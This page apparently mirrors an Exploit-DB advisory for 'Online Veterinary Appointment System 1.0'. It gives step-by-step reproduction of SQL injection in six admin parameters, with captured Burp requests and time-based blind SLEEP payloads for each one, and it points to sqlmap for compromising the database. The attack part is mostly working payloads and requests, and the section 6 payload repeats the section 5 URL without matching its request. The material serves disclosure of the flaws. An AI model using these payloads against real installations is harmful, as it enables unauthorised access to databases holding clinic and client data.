Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/twseptian/ovasv1.0-multiple-sql-injection

Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection
https://github.com/twseptian/ovasv1.0-multiple-sql-injection

sql-injection sql-injection-exploitation web-exploitation

Last synced: 4 months ago
JSON representation

Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection

Awesome Lists containing this project

README 

        
# Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection

original link: https://www.exploit-db.com/exploits/50644

```bash

# Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection

# Date: 2022-01-05

# Exploit Author: twseptian

# Vendor Homepage: https://www.sourcecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html

# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ovas.zip

# Version: v1.0

# Tested on: Kali Linux 2021.4

```



## SQL Injection:

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.



## Attack Vector:

An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.



### 1. Appointment Requests - Vulnerable Parameter(s): id

#### Steps of reproduce:

1. Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL: `http://localhost/ovas/admin/?page=appointments`, then go to 'Action' > 'View'.

2. Step-2: Put the SQL Injection payloads in 'id' field. time-based blind payload : `page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq`



3. Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.



### 2. Inquiries - Vulnerable Parameter(s): id



#### Steps of reproduce:

1. Step-1: On the dashboard navigate to 'Inquiries' page using the following URL: `http://localhost/ovas/admin/?page=inquiries`, then go to 'Action' > 'View'.

2. Step-2: Let's intercept 'View' request using burpsuite: 

```bash

GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Connection: close

Referer: http://localhost/ovas/admin/?page=inquiries

Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

```

Put the SQL Injection payloads in 'id' field.

time-based blind payload : `/ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP`



3. Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.



### 3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username

#### Steps of reproduce:

1. Step-1: On the dashboard navigate to 'My Account' page using the following URL: `http://localhost/ovas/admin/?page=user`

2. Step-2: then let's intercept 'Update' request using burpsuite: 

```bash

POST /ovas/classes/Users.php?f=save HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118

Content-Length: 796

Origin: http://localhost

Connection: close

Referer: http://localhost/ovas/admin/?page=user

Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin



-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="id"



4

-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="firstname"



user

-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="lastname"



user

-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="username"



user

-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="password"



-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="img"; filename=""

Content-Type: application/octet-stream



-----------------------------24959341351495697487735843118--

```

Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username

for example, the time-based blind payload in 'id':  

```bash

[SNIP]

Content-Disposition: form-data; name="id"



4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)

-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="firstname"



user

-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="lastname"



user

-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="username"



user

-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="password"



-----------------------------24959341351495697487735843118

Content-Disposition: form-data; name="img"; filename=""

Content-Type: application/octet-stream



-----------------------------24959341351495697487735843118--

```



3. Step-3: If we use BurpSuite, click 'Send'. The server target accepted our payload, and the response got delayed by 5 seconds. The same thing for other parameters



### 4. Category List - Vulnerable Parameter(s): id

#### Steps of reproduce:

1. Step-1: On the dashboard navigate to 'Category List ' page using the following URL: `http://localhost/ovas/admin/?page=categories`, then go to 'Action' > 'Edit' 

2. Step-2: Let's intercept 'Edit' request using burpsuite: 

```bash

GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Connection: close

Referer: http://localhost/ovas/admin/?page=categories

Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

```

Put the SQL Injection payloads in 'id' field.

time-based blind payload : `/ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb`



3. Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.



### 5. Service List - Vulnerable Parameter(s): id

#### Steps of reproduce:

1. Step-1: On the dashboard navigate to 'Service List ' page using the following URL: `http://localhost/ovas/admin/?page=services`,then go to 'Action' > 'View' 

2. Step-2: Let's intercept 'View' request using burpsuite: 

```bash

GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Connection: close

Referer: http://localhost/ovas/admin/?page=services

Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

```

Put the SQL Injection payloads in 'id' field.

time-based blind payload : `/ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ`



3. Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.



### 6. Admin User List - Vulnerable Parameter(s): id

#### Steps of reproduce:

1.Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL: `http://localhost/ovas/admin/?page=user/list`,then go to 'Action' > 'Edit' 



2.Step-2: Let's intercept 'Edit' request using burpsuite: 

```bash

GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://localhost/ovas/admin/?page=user/list

Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9

Upgrade-Insecure-Requests: 1

Sec-Fetch-Dest: document

Sec-Fetch-Mode: navigate

Sec-Fetch-Site: same-origin

Sec-Fetch-User: ?1

```

Put the SQL Injection payloads in 'id' field.

time-based blind payload : `/ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ`



3. Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.